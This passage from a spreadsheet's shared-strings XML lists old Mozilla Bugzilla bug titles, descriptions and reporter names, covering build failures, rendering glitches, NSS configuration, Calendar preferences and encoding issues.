    <t>NSS-240554</t>
  </si>
  <si>
    <t>Add ECDSA support in S/MIME</t>
  </si>
  <si>
    <t>NSS 3.9 with ECC support does not enable the use of ECDSA signatures with S/MIME.</t>
  </si>
  <si>
    <t>vipul.gupta</t>
  </si>
  <si>
    <t>BUGZILLA-251898</t>
  </si>
  <si>
    <t>Add function information to PatchReader output.</t>
  </si>
  <si>
    <t>It's trivial to add function information to PatchReader output (with the
upcoming 0.9.5). Patch coming up.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-239902</t>
  </si>
  <si>
    <t>cleaning up imap inbox on exit with inbox configured for offline use leaves temp files</t>
  </si>
  <si>
    <t>If you set up your imap inbox for offline use and configure the server to
expunge the inbox on exit we'll leave temp files around because we try to
compact the offline inbox store on exit but exit before the offline store
compact is finished. This causes us to leave temp files around in the imap
directory. The temporary fix is to not compact the offline store when the msg
window is null and make it so the msg window is only null when doing a compact
at exit.</t>
  </si>
  <si>
    <t>CORE-946647</t>
  </si>
  <si>
    <t>Remove bidi attributes in nsIMarkupDocumentViewer as dead code</t>
  </si>
  <si>
    <t>nsIMarkupDocumentViewer::bidiTextDirection looks like dead code:
https://mxr.mozilla.org/comm-central/search?string=bidiTextDirection</t>
  </si>
  <si>
    <t>CORE-416622</t>
  </si>
  <si>
    <t>docshell navigation tests intermittently failing with NS_ERROR_XPC_BAD_OP_ON_WN_PROTO</t>
  </si>
  <si>
    <t>Near as I can tell (by only looking at the likely-seeming failed test runs not every single failure) the tests from bug 408052 ran just fine from when they landed 2008-01-27 until the afternoon of 2008-02-05 and since then have been intermittently failing with
*** 11630 ERROR FAIL | Error thrown during test: uncaught exception: [Exception... Illegal operation on WrappedNative prototype object  nsresult: 0x8057000c (NS_ERROR_XPC_BAD_OP_ON_WN_PROTO)  location: JS frame :: http://localhost:8888/tests/docshell/test/navigation/NavigationUtils.js :: searchForFinishedFrames :: line 207  data: no] | got 0 expected 1 | /tests/docshell/test/navigation/test_reserved.html
around once or twice a day in at least test_reserved.html and test_sibling-off-domain.html on qm-centos5-01 and qm-xserve01.
No I don't have answers to any of the reasonable questions like
* did they just happen not to fail until then (freeze cutting down the number of runs lots of other failures wrecking things first)?
* did something unobvious land in the couple of days before that that affects them?
* is something different in the test harness or timeouts or something on Mac and Linux that explains why it seems not to happen on Windows?
* is it just delayed-onset bug 373261?
(Not to mention is it a Testing bug an XPConnect bug a Docshell bug or a bug in the tests themselves? so I'm choosing General.)</t>
  </si>
  <si>
    <t>DIRECTORY-89716</t>
  </si>
  <si>
    <t>browse doesn't update getError</t>
  </si>
  <si>
    <t>If you call browse on an entry that doesn't exist it returns a NULL value but 
apparently doesn't update getError which always returns success. Shouldn't it 
return No such entry (32)?</t>
  </si>
  <si>
    <t>CORE-360214</t>
  </si>
  <si>
    <t>cairo Mac OS X builds have broken select widget rendering</t>
  </si>
  <si>
    <t>Cairo Mac OS X builds have broken select widget rendering. The box on the right with the triangle is missing.</t>
  </si>
  <si>
    <t>BUGZILLA-346265</t>
  </si>
  <si>
    <t>checksetup.pl should use Getopt::Long instead of its current hack</t>
  </si>
  <si>
    <t>Getopt::Long is part of the standard perl distribution. Right now instead of Getopt::Long we're using a hacky way of calling grep() on @ARGV to get the switches.
Instead we should use Getopt::Long!</t>
  </si>
  <si>
    <t>FIREFOX-426175</t>
  </si>
  <si>
    <t>FUEL Application.extensions isn't working</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9pre) Gecko/2008033005 Minefield/3.0pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9pre) Gecko/2008033005 Minefield/3.0pre
Title says it all. Calling alert(Application.extensions) in the Error console returns null. Should return a fuelIExtensions interface.
Reproducible: Always
Someone on Mozillazine (http://forums.mozillazine.org/viewtopic.php?p=3319634#3319634) proposed it was related to these two checkins:
2008-03-25 14:19 / https://bugzilla.mozilla.org/show_bug.cgi?id=425062
2008-03-24 17:38 / https://bugzilla.mozilla.org/show_bug.cgi?id=407693</t>
  </si>
  <si>
    <t>wjohnston2000</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-477943</t>
  </si>
  <si>
    <t>Ludovic - Windows Vista Ultimate License</t>
  </si>
  <si>
    <t>CALENDAR-165425</t>
  </si>
  <si>
    <t>no reload of remote servers on startup</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de-AT rv:1.1) Gecko/20020826
Build Identifier: Mozilla/5.0 (X11 U Linux i686 de-AT rv:1.1) Gecko/20020826
Remote Servers are lost on restart of Calendar. Preference is not saved.
Reproducible: Always
Steps to Reproduce:
1. Enable Preferences --&gt; Calendar --&gt; Reload Remote Calendars On Startup
2. Open Preferences again
3. Add http://www.mozilla.org/projects/calendar/caldata/GermanHolidays.ics as
remote Server
4. Restart Calendar
Actual Results:  
Result on 2: The box is unchecked again
Result on 4: The remote server has gone.
Expected Results:  
2: The preference should have been saved.
4: The remote server should be saved.</t>
  </si>
  <si>
    <t>DATA_&amp;_BI_SERVICES_TEAM-781921</t>
  </si>
  <si>
    <t>problem with affliliates dev db</t>
  </si>
  <si>
    <t>120810 13:11:05  InnoDB: Error: in ALTER TABLE `affiliates_fb_dev_allizom`.`facebook_facebookaccountlink`
InnoDB: has or is referenced in foreign key constraints
InnoDB: which are not compatible with the new table definition.
120810 13:11:05  InnoDB: Error: table `affiliates_fb_dev_allizom`.`facebook_facebookaccountlink` does not exist in the InnoDB internal
InnoDB: data dictionary though MySQL is trying to drop it.
InnoDB: Have you copied the .frm file of the table to the
InnoDB: MySQL database directory from another database?
InnoDB: You can look for further help from
InnoDB: http://dev.mysql.com/doc/refman/5.1/en/innodb-troubleshooting.html
120810 13:15:27  InnoDB: Error: in ALTER TABLE `affiliates_fb_dev_allizom`.`facebook_facebookaccountlink`
InnoDB: has or is referenced in foreign key constraints
InnoDB: which are not compatible with the new table definition.
120810 13:15:27  InnoDB: Error: table `affiliates_fb_dev_allizom`.`facebook_facebookaccountlink` does not exist in the InnoDB internal
InnoDB: data dictionary though MySQL is trying to drop it.
InnoDB: Have you copied the .frm file of the table to the
InnoDB: MySQL database directory from another database?
InnoDB: You can look for further help from
InnoDB: http://dev.mysql.com/doc/refman/5.1/en/innodb-troubleshooting.html</t>
  </si>
  <si>
    <t>scabral</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-188533</t>
  </si>
  <si>
    <t>[AxPlugin] Build problems in plugin</t>
  </si>
  <si>
    <t>Latest pull of Mozilla results in this build error below. I think it is because
I pull in some string_s libs so a patch follows to remove them. I'm not sure
what caused the problem to happen just now but I would hazard from the error it
is xpcom glue related.
link /NOLOGO /DLL /OUT:npmozax.dll /PDB:npmozax.pdb /SUBSYSTEM:WINDOWS
/DEF:npmozax.def  StdAfx.obj Legac
yPlugin.obj MozActiveX.obj npwin.obj ActiveScriptSite.obj ControlEventSink.obj
ControlSite.obj ControlSit
eIPFrame.obj ItemContainer.obj PropertyBag.obj XPConnect.obj XPCDocument.obj
XPCBrowser.obj PrefObserver.
obj   MozActiveX.res   /DEBUG /DEBUGTYPE:CV      
../../../../../dist/lib/string_s.lib ../../../../../dis
t/lib/string_obsolete_s.lib ../../../../../dist/lib/xpcomglue.lib
../../../../../dist/lib/xpcom.lib ../..
/../../../dist/lib/nspr4.lib ../../../../../dist/lib/plc4.lib
../../../../../dist/lib/plds4.lib ../../../
../../dist/lib/nspr4.lib ../../../../../dist/lib/plc4.lib
../../../../../dist/lib/plds4.lib kernel32.lib
user32.lib gdi32.lib winmm.lib wsock32.lib advapi32.lib comdlg32.lib ole32.lib
oleaut32.lib uuid.lib shel
l32.lib
xpcomglue.lib(nsEmbedString.obj) : error LNK2005: class nsStringAllocator
&amp; __cdecl StringAllocato
r_char(void) (?StringAllocator_char@@YAAAV?$nsStringAllocator@D@@XZ) already
defined in string_s.lib(nsR
eadableUtils.obj)
xpcomglue.lib(nsEmbedString.obj) : error LNK2005: class
nsStringAllocator &amp; __cdecl Stri
ngAllocator_wchar_t(void)
(?StringAllocator_wchar_t@@YAAAV?$nsStringAllocator@G@@XZ) already defined in
string_s.lib(nsReadableUtils.obj)
xpcomglue.lib(nsEmbedString.obj) : warning LNK4006: class
nsStringAllocator &amp; __cdecl StringAlloca
tor_char(void) (?StringAllocator_char@@YAAAV?$nsStringAllocator@D@@XZ) already
defined in string_s.lib(n
sReadableUtils.obj) second definition ignored
xpcomglue.lib(nsEmbedString.obj) : warning LNK4006: class
nsStringAllocator &amp; __cdecl St
ringAllocator_wchar_t(void)
(?StringAllocator_wchar_t@@YAAAV?$nsStringAllocator@G@@XZ) already defined i
n string_s.lib(nsReadableUtils.obj) second definition ignored
   Creating library npmozax.lib and object npmozax.exp
npmozax.dll : fatal error LNK1169: one or more multiply defined symbols found
make[6]: *** [npmozax.dll] Error 145
make[6]: Leaving directory
`/cygdrive/c/m/source_comdemo/mozilla/embedding/browser/activex/src/plugin'
make[5]: *** [libs] Error 2
make[5]: Leaving directory
`/cygdrive/c/m/source_comdemo/mozilla/embedding/browser/activex/src'
make[4]: *** [libs] Error 2
make[4]: Leaving directory `/cygdrive/c/m/source_comdemo/mozilla/embedding/browser'
make[3]: *** [libs] Error 2
make[3]: Leaving directory `/cygdrive/c/m/source_comdemo/mozilla/embedding'
make[2]: *** [tier_9] Error 2
make[2]: Leaving directory `/cygdrive/c/m/source_comdemo/mozilla'
make[1]: *** [default] Error 2
make[1]: Leaving directory `/cygdrive/c/m/source_comdemo/mozilla'
make: *** [build] Error 2</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-35816</t>
  </si>
  <si>
    <t>minimize size of serialized RDF/XML</t>
  </si>
  <si>
    <t>The current RDF/XML serializer is pretty verbose. Optimize output for minimum space.</t>
  </si>
  <si>
    <t>FIREFOX-327762</t>
  </si>
  <si>
    <t>Margins on tabbrowser from places.css</t>
  </si>
  <si>
    <t>The right hand scrollbar is not flush against the edge of the window there is a space of a few millimeters the same is true for the bottom the space in the top is between the tab bar and the places bar. The left side does not have a space. It looks like it is appcontent that has the extra space. The tab bar is also white.</t>
  </si>
  <si>
    <t>CORE-350018</t>
  </si>
  <si>
    <t>nsIFrame code returns coordinates with (0 0) in bottom-left on mac</t>
  </si>
  <si>
    <t>In the Cocoa toolkit on mac the origo point is based in the bottom-left in all kind of drawing and positioning.
Now when you interact with Mozilla code you're used to do the conversion from top-left to bottom-most coordinate systems.
What surprised me when I sat debugging just now is that a few core Gecko APIs inside cross-platform code actually return cocoa rects on mac.
I'm not sure if this is a bug or feature but I'd think that the cross-platform code should behave the same on all platforms in this sense.
For example:
nsIFrame::GetScreenRect()
nsIFrame::GetScreenRectExternal()
(I don't know if there are more)
If this is expected behavior I think a comment is at least warranted. Other XP-code (like nsAccessibility where this is used) depend on it.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-412176</t>
  </si>
  <si>
    <t>Update Catalan Wikipedia search plugin to support suggestions</t>
  </si>
  <si>
    <t>Created attachment 296829
patch for Catalan wikipedia searchplugin
The search plugin Wikipedia offers on wikipedia.org implements the MozSearch
suggestions feature.
Let's update the Wikipedia plugin in the Catalan localization of Firefox 3 to do
the same.
based on bug 411728 .</t>
  </si>
  <si>
    <t>CORE-77549</t>
  </si>
  <si>
    <t>leaky.h and leaky.cpp disagree on definition of ::new</t>
  </si>
  <si>
    <t>MARKETING-726199</t>
  </si>
  <si>
    <t>[BuildBeta] Add new Beta promo to /fx text promo spot (replacing affiliates)</t>
  </si>
  <si>
    <t>To do this a new text string is needed along the lines and brevity of Share Firefox affiliates promo. Matej - can you help with this copy? 
How about 
Try Beta
Get new features first
Or the like depending on the main user benefit of Beta. Looking to Grace for those.</t>
  </si>
  <si>
    <t>CORE-109345</t>
  </si>
  <si>
    <t>riag.com - unable to use Back button without leaving site</t>
  </si>
  <si>
    <t>(I am using the 2001-11-06(03) nightly build)
My company is comparing on-line tax research services and we are unable to even 
consider our 1st choice (RIA) unless we use Internet Explorer.  The problem is 
that their site uses some kind of framed page server where the top URL doesn't 
change.  So if you try to use the Back button Mozilla backs out of the site 
completely Internet Explorer doesn't do this.
You need a login to test the service:  
- use tu21-yali (for both login-name and password)
We're on a trial period through the month of November 2001 so hurry up and 
test it!  It's unlimited usage for now but later you'll need to ask me to test 
it.
P.S.  I'm sure there's a more general way of describing this e.g. Back button 
only tracks top-frame URL not intermediate sub-frames but I'll let someone 
more knowledgeable figure it out!</t>
  </si>
  <si>
    <t>Tony.Tovar</t>
  </si>
  <si>
    <t>FIREFOX-357246</t>
  </si>
  <si>
    <t>Ship pending locales for Firefox 2.0.0.1</t>
  </si>
  <si>
    <t>This is the tracking bug for locales that did not make the cut for 2.0.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-478932</t>
  </si>
  <si>
    <t>Add 'AUS Server' Component to Mozilla Messaging product</t>
  </si>
  <si>
    <t>Now that we have our own AUS Server I'd like to request a separate component to track bugs with it under the Mozilla Messaging product.
As a side note would it be possible for me to gain sufficient permissions to administer components under the Mozilla Messaging product ?</t>
  </si>
  <si>
    <t>CORE-332155</t>
  </si>
  <si>
    <t>nsIContent docs aren't current</t>
  </si>
  <si>
    <t>the reason i'm filing this bug is:
766                         * Returns NS_OK unless a file error occurs.
767                         */
768 jst            3.77    virtual void DumpContent(FILE* out = stdout PRInt32 aIndent = 0
but i'd like to slightly improve the file overall.</t>
  </si>
  <si>
    <t>FIREFOX-456048</t>
  </si>
  <si>
    <t>Use the new D&amp;D API in tabbrowser</t>
  </si>
  <si>
    <t>Created attachment 339468
patch
Use the new D&amp;D API in tabbrowser
Next -  places next -  extend drop target next - actual work on detach tabs!</t>
  </si>
  <si>
    <t>CORE-685113</t>
  </si>
  <si>
    <t>Enable/Disable/Resize Web Console corrupts content rendered</t>
  </si>
  <si>
    <t>Created attachment 558765
screencast.ogv
User Agent:  
Steps to reproduce:
1. Open http://news.gmane.org/gmane.linux.nfs.
2. Enable Web Console (shift-ctrl-k).
3. Resize Web Console.
Actual results:
2. and 3. corruption.
Expected results:
2 and 3. no corruption</t>
  </si>
  <si>
    <t>CORE-101998</t>
  </si>
  <si>
    <t>implement GB18030 to Unicode supplement planes conversion</t>
  </si>
  <si>
    <t>we implement GB18030 conversion for BMP but not for supplement planes. Here are 
more information.
From:        Kenneth Whistler    1:02 PM
 Subject:    Re: GB18030
     To:     ftang@netscape.com
    CC:      unicode@unicode.org kenw@sybase.com
Frank
&gt; You don't need to explain to me
&gt; the concept of GB18030. The question I have is about details mapping
&gt; information.
Now now there's no need to get snippy with me. It sounded
like you were unclear from the kinds of questions you were
asking.
&gt; I look at
&gt; http://oss.software.ibm.com/cvs/icu/charset/data/xml/gb-18030-2000.xml .
&gt; 
&gt; It is interesting that the mapping between U+10000 and U+10FFFF is check
&gt; in only 5 weeks ago in the version 1.3
&gt; 
&gt;              |          30910:   &lt;range uFirst=10000 uLast=10FFFF
&gt; bFirst=90 30 81 30 bLast=E3 32 9A 35  bMin=81 30 81 30 bMax=FE 39
&gt; FE 39/&gt;
&gt; 
&gt; Is the U+10000 - U+10FFFF mapping between Unicode and GB18030 specified
&gt; in the GB18030 standard itself? can someone fax me that page ? Thanks.
Unfortunately I don't have the revised and corrected version of
the standard to hand.
But on p. 5 clause 7.3 of the original GB 18030-2000 it states (in
Chinese):
From 0x90308130 to 0xE339FE39 altogether 1058400 code points correspond
to GB 13000's 16 supplementary planes...
If you look at the ICU specification bFirst=90 30 81 30 and
bLast=E3 32 9A 35 corresponds to:
83 groups (90..E2) of GB 18030:    83 x 10 x 1260 = 1045800 code points
 2 planes (E3 30..31) of GB 18030:       2 x 1260 =    2520 code points
25 rows   (E3 32 81..99) of GB 18030:        25 x 10 =  250 code points
 6 cells  (E3 32 9A 30..35) of GB 18030:                  6 code points
                                             Total    1048576 code points
And 1048576 code points = 16 x 66536 code points = 16 planes of 10646.
So GB 18030 and ICU agree. Start at 0x90308130 and lay out all the
rest of the Unicode supplementary code points in order.
--Ken</t>
  </si>
  <si>
    <t>CORE-418804</t>
  </si>
  <si>
    <t>Update storage query processor for XUL templates from changes to mozIStorageService::OpenDatabase</t>
  </si>
  <si>
    <t>I think we have to update in XUL template the query processor on Storage to use  connectionReady property of a storage connection object.</t>
  </si>
  <si>
    <t>CORE-312550</t>
  </si>
  <si>
    <t>Incorrect wrapping in RTL textarea with horizontal scrollbar</t>
  </si>
  <si>
    <t>When an RTL textarea has a horizontal scrollbar (because one of the lines is
unbreakable and too wide to fit in the textarea) the rest of the text wraps
incrorrectly i.e it wraps according to the width of the longest line instead
of the width of the textarea itself. This does not happen in LTR textareas.
Testcase coming up.</t>
  </si>
  <si>
    <t>NSS-164126</t>
  </si>
  <si>
    <t>makefile build error</t>
  </si>
  <si>
    <t>When build JSS if we do a gmake import and import nss the 
directory is mozilla/dist/public/nss 
If you check out NSS and build NSS then builld JSS JSS 
will fail since nss build created a mozilla/dist/public/security
directory</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-506915</t>
  </si>
  <si>
    <t>Output with mediatype and SVG doesn't work properly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 fr rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 fr rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
When the mediatype attribute of an output element is used with an svg image and its mime-type image/svg+xml the image is not displayed.
However it is displayed when used with the application/xhtml+xml mediatype.
Reproducible: Always
Steps to Reproduce:
1. display the attached Xhtml document
Actual Results:  
The first output doesn't display the svg SVG image.
The second output does.
Expected Results:  
The opposite</t>
  </si>
  <si>
    <t>imphil</t>
  </si>
  <si>
    <t>tangui.lepense</t>
  </si>
  <si>
    <t>CORE-367177</t>
  </si>
  <si>
    <t>Turn on nsTextFrameThebes</t>
  </si>
  <si>
    <t>This is a tracking bug for turning on nsTextFrameThebes.</t>
  </si>
  <si>
    <t>CORE-380502</t>
  </si>
  <si>
    <t>[FIX] Deal with null nsIRenderingContext in nsTextFrameThebes.cpp</t>
  </si>
  <si>
    <t>http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/layout/generic/nsTextFrameThebes.cpp&amp;rev=3.17&amp;root=/cvsroot&amp;mark=1621-1623#1611
Patch coming up...</t>
  </si>
  <si>
    <t>NSS-231018</t>
  </si>
  <si>
    <t>Streamline NSS configuration for AIX</t>
  </si>
  <si>
    <t>Currently the NSS build configuration for AIX is spread across several files
with several duplicated settings. I would like to merge the common settings into
AIX.mk using the AIX`uname -v`.`uname-r`.mk files for specific settings needed
for particular AIX releases.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-135833</t>
  </si>
  <si>
    <t>View Source</t>
  </si>
  <si>
    <t>[FIX]Lack of warning when unable to view the page source (renders page instead of source)</t>
  </si>
  <si>
    <t>Mozilla doesn't warn when memory and disk cache is set to zero and you try to 
view source.
Instead it asks you whether you want to repost data and then displays in 
viewsource window the page just like as it is rendered in browser.
This affects just pages generated using POST method others are displayed 
properly.
The browser should warn that it is unable to display it or it should keep the 
last source in some `special` cache - to be able to display even if both (d&amp;m) 
caches are set to 0 kB.
The page it could be tested on is http://xhaven.net/bugtest.php follow the 
instructions there
Win2k 2002-04-05-03</t>
  </si>
  <si>
    <t>CORE-428326</t>
  </si>
  <si>
    <t>Configuring with a relative srcdir breaks unit tests in XPCOM</t>
  </si>
  <si>
    <t>Created attachment 314863
Use the absolute srcdir rev. 1
Configuring with a relative srcdir (e.g. ../src/configure) breaks unit tests in XPCOM. This is because we end up passing $(srcdir) to a binary which tries to initialize an nsIFile with it and nsIFile can only be initialized with an absolute path. easy though not especially pretty fix attached.
This is a regression from the tests of bug 416886 and I'd like to get it landed in CVS for 1.9</t>
  </si>
  <si>
    <t>CORE-464043</t>
  </si>
  <si>
    <t>change nsDeque to use malloc for mData</t>
  </si>
  <si>
    <t>Created attachment 347291
stage one - don't crash
bug 457483 comment 26 shows nsDeque fails under low memory.
I have other patches which would change Push(Front) to indicate failure to the callers. I'm working on it in a repo I'd want to test that before I pushed it to a bug but this is actually independent</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-490885</t>
  </si>
  <si>
    <t>Create SVN repo for mozillaservice.org</t>
  </si>
  <si>
    <t>Please create a new SVN repo
http://svn.mozilla.org/projects/mozillaservice.org</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-199330</t>
  </si>
  <si>
    <t>[minimo] get --strip data on tbox</t>
  </si>
  <si>
    <t>BUGZILLA-442016</t>
  </si>
  <si>
    <t>Bugzilla::User::bless_groups should be returning Bugzilla::Group objects</t>
  </si>
  <si>
    <t>Right now bless_groups returns a hash and it should be returning Bugzilla::Group objects instead.</t>
  </si>
  <si>
    <t>CORE-191242</t>
  </si>
  <si>
    <t>Event propagation quirky with changed EventTarget nodes</t>
  </si>
  <si>
    <t>I've noticed a rather interesting behavior in Mozilla one which the DOM 2
Events Recommendation and the DOM 3 Events Last Call Working Draft from W3C do
not cover.
Basically when I replace the actual event target (or likely any ancestor node
of the actual target) with another node the DOM specs are not clear on correct
behavior.
I'm attaching two testcases an XUL testcase and an XHTML testcase.  The XUL
testcase is more descriptive but the XHTML testcase will render in non-Gecko
based browsers as well.
I believe there is at least one bug in the behaviors of the browser here I'm
just not sure what exactly is wrong and what is correct.</t>
  </si>
  <si>
    <t>NSS-164124</t>
  </si>
  <si>
    <t>Need new makefile for the intel solaris 10 builds.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.78 [en] (X11 U SunOS 5.7 sun4u)
Build Identifier: 
Need new makefile for the intel solaris 10 builds. Which should live in:
/h/rachael/build_area/N7.0/5.10/i386/mtchan082002/mozilla/security/coreconf
filename: SunOS5.10_i86pc.mk
Contents:
#
# The contents of this file are subject to the Mozilla Public
# License Version 1.1 (the License) you may not use this file
# except in compliance with the License. You may obtain a copy of
# the License at http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an AS
# IS basis WITHOUT WARRANTY OF ANY KIND either express or
# implied. See the License for the specific language governing
# rights and limitations under the License.
#
# The Original Code is the Netscape security libraries.
#
# The Initial Developer of the Original Code is Netscape
# Communications Corporation.  Portions created by Netscape are
# Copyright (C) 1994-2000 Netscape Communications Corporation.  All
# Rights Reserved.
#
# Contributor(s):
#
# Alternatively the contents of this file may be used under the
# terms of the GNU General Public License Version 2 or later (the
# GPL) in which case the provisions of the GPL are applicable
# instead of those above.  If you wish to allow use of your
# version of this file only under the terms of the GPL and not to
# allow others to use your version of this file under the MPL
# indicate your decision by deleting the provisions above and
# replace them with the notice and other provisions required by
# the GPL.  If you do not delete the provisions above a recipient
# may use your version of this file under either the MPL or the
# GPL.
#
# Config stuff for Solaris 10 on x86
#
SOL_CFLAGS      = -D_SVID_GETTOD
include $(CORE_DEPTH)/coreconf/SunOS5.mk
CPU_ARCH                = x86
ARCHFLAG                =
OS_DEFINES              += -Di386
ifeq ($(OS_RELEASE)5.10_i86pc)
        OS_DEFINES += -DSOLARIS2_10
endif
OS_LIBS += -lthread -lnsl -lsocket -lposix4 -ldl -lc
Reproducible: Always
Steps to Reproduce:
1.Try to build browser on intel with solaris 10.
2.
3.
Actual Results:  
Failed to build because of missing makefile.
Expected Results:  
Successfull build.</t>
  </si>
  <si>
    <t>khl</t>
  </si>
  <si>
    <t>SEAMONKEY-209516</t>
  </si>
  <si>
    <t>Requests for return receipts in Newsgroups - and I shouldn't get them</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030529
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030529
In Newsgroups postings I am often getting a pop up window saying that the sender
has requested a return receipt.
In my return receipt settings I have set that if I am not in the 'To' or 'CC'
field then I will 'never' send a return receipt.
In Newsgroups I am obviously not in the To or CC fields yet I still get the
request. Why?
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>farcusnz</t>
  </si>
  <si>
    <t>CALENDAR-351870</t>
  </si>
  <si>
    <t>unable to unselect single event from a group of selected events in main view</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 pl rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060908 Calendar/0.3a2+
it was not big problem if multiselection in main view was disabled however because of bug 321384 it could be nice if I can select and unselect events using main view - right now it is supported only via unifinder
Reproducible: Always
Steps to Reproduce:
1. create two events
2. select first one (press it)
3. press CTRL and click second event
4. do not release CTRL and click again second event
Actual Results:  
second event is editable - I can modify title
Expected Results:  
second event should not be selected</t>
  </si>
  <si>
    <t>CORE-232969</t>
  </si>
  <si>
    <t>non-ASCII text in pref:global-platform\nsWindowsHooks.properties prefsLabel should be saved with native coding in windows registry</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040113
http://lxr.mozilla.org/seamonkey/source/xpfe/components/winhooks/nsWindowsHooksUtil.cpp#333
Key coded with UTF-8 is set into registry.
In Japanese Windows Native charactor is set/get Shift-JIS coding in regidtry.
We should set/get regidtry key with Shift-JIS coding in Japanese Windows.
Reproducible: Always
Steps to Reproduce:
1.I installed JLP those prefsLabel has Japanese Charactor.
2.I set mozilla is default browser.
3.Startmenu -&gt; Inernet(Mozilla) -&gt; Open Context Menu(Mouse Right Click)
Actual Results:  
Charactor is broken (in en-US Pr&amp;eferences)
Expected Results:  
Charactor display correct(Japanese Charactor).
Because source code is not changed.
I believe we can see the same result at current build.</t>
  </si>
  <si>
    <t>mozilla758+bmo</t>
  </si>
  <si>
    <t>CORE-322424</t>
  </si>
  <si>
    <t>Default disabled select border no longer matches enabled border</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
The default disabled select border styling no longer matches the enabled border.  
Reproducible: Always
Actual Results:  
Default disabled select form field border does not match enabled select border.
Expected Results:  
Default disabled select form field border should match enabled select border.
Note: This is a regression.  The default disabled select form field style on Firefox 1.0 and Mozilla 1.7.12 displays the border correctly.  The disabled border should match the enabled border for select fields.  For a css comparison it is the difference between a solid 1px border (the way it's supposed to show) and an inset 2px border (the way it is showing now)</t>
  </si>
  <si>
    <t>mattsch</t>
  </si>
  <si>
    <t>CORE-105182</t>
  </si>
  <si>
    <t>Mozilla scrolls to the top on any unnamed anchor</t>
  </si>
  <si>
    <t>Bug 80784 made it so Mozilla scrolls to the top of the document if the user
clicks on a link to any unnamed anchor.
In that bug beppe correctly pointed out that the W3C had gone so far as to
mention this as being a _really_bad_thing_ in its Common User-Agent Problems
document:
There is a good W3C Note that all UA implementors should read Common User Agent 
Problems. In point 1.2 If the user attempts to follow a link that is broken 
because it designates a missing anchor let the user know it is broken. 
 says:
    Wrong: Some user agents scroll to the top or bottom of the
    document when the user attempts to follow a broken link. This behavior
    is discouraged since it is indistinguishable from the correct behavior
    when a target is at the beginning or end of a document.
It seems perverse to fix our browser so that our CUAP compliance regresses.
(Tracking bug: 68427). The underlying problem is that the browser is taking the
user to a place the page author may not have meant them to go. There are
scenarios where this could be very bad.
The correct solution is to make top special and scroll to the top only on
#top (in quirks mode only). This way you follow the W3C but also do what the
author blatantly intended when his intention is clear. This would fix all the
sites mentioned back in bug 80784.
Someone asked Then why not #bottom? Or something else?. The answer to this is
that #bottom is not in common use on the web.
Gerv</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-479978</t>
  </si>
  <si>
    <t>remove references to MOZ_PROFILE from the build system</t>
  </si>
  <si>
    <t>I removed MOZ_PROFILE support a while ago since it essentially duplicated the functionality of MOZ_DEBUG_SYMBOLS. Looks like I missed a few spots though:
http://hg.mozilla.org/mozilla-central/annotate/920e3f7dfd49//configure.in#l8023 (I wouldn't actually click this link it takes ages to load.)
http://hg.mozilla.org/mozilla-central/annotate/69c86f3acc5a/Makefile.in#l137
http://hg.mozilla.org/mozilla-central/annotate/69c86f3acc5a/config/autoconf.mk.in#l592
http://hg.mozilla.org/mozilla-central/annotate/69c86f3acc5a/config/config.mk#l246
We should clean up the rest of those. CCing a few of my favorite code janitors.</t>
  </si>
  <si>
    <t>CORE-526411</t>
  </si>
  <si>
    <t>after pausing a video it often won't restart playing later</t>
  </si>
  <si>
    <t>This appears to be linux-specific.  Can't reproduce on Win 7.
Run a 3.6 nightly and loading the URL above it will start playing when the page loads but if you pause and restart it a few times it will eventually stop playing once you unpause.  Sometimes it's one click sometimes it's three.
Running this on Fedora 11.  Will check for a regression from 3.5.</t>
  </si>
  <si>
    <t>CORE-220057</t>
  </si>
  <si>
    <t>Crash using nsBoxObject w/ null mContent</t>
  </si>
  <si>
    <t>./run-mozilla.sh ./xpcshell
a='@mozilla.org/layout/xul-boxobject-browser1' 
var o = Components.classes[a].createInstance() 
o instanceof Components.interfaces.nsIBoxObject 
  print(a'\t'o) 
  for (c in o) try { 
   dump(c+' ') 
   print(o[c]) 
  } catch(e) { 
   print(e) 
  } 
actual results: crash
expected results: no crash
reason for crash: uninitalized mContent
The properties the fail are: .x.y.screenX.screenY</t>
  </si>
  <si>
    <t>CORE-346847</t>
  </si>
  <si>
    <t>Clicking a link changes page layout</t>
  </si>
  <si>
